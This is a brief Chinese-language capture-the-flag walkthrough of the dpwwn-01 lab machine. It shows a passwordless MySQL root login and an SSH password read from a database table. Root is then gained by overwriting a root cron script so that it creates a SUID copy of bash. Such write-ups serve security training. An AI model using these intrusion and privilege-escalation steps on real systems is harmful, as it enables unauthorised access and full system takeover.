dpwwn-01
usershell
目标IP:192.168.205.147
服务信息:
22/tcp open ssh
80/tcp open http
3306/tcp open mysql
fscan
[+] mysql:192.168.205.147:3306:root
mysql 连接
mysql -h 192.168.205.147 -u root
MariaDB [(none)]> show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| mysql |
| performance_schema |
| ssh |
+--------------------+
4 rows in set (0.009 sec)
MariaDB [(none)]> use ssh;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
MariaDB [ssh]> show tables;
+---------------+
| Tables_in_ssh |
+---------------+
| users |
+---------------+
1 row in set (0.008 sec)
MariaDB [ssh]> select * from ssh.users;
+----+----------+---------------------+
| id | username | password |
+----+----------+---------------------+
| 1 | mistic | testP@$$swordmistic |
+----+----------+---------------------+
1 row in set (0.003 sec)
获得ssh凭据
登录ssh,得到user权限
rootshell
枚举
cat /etc/crontab
*/3 * * * * root /home/mistic/logrot.sh
修改logrot.sh
为
#!/bin/bash
#
cp /bin/bash /home/mistic/rootbash
chmod +xs /home/mistic/rootbash
等几分钟
~/rootbash -p
获得root权限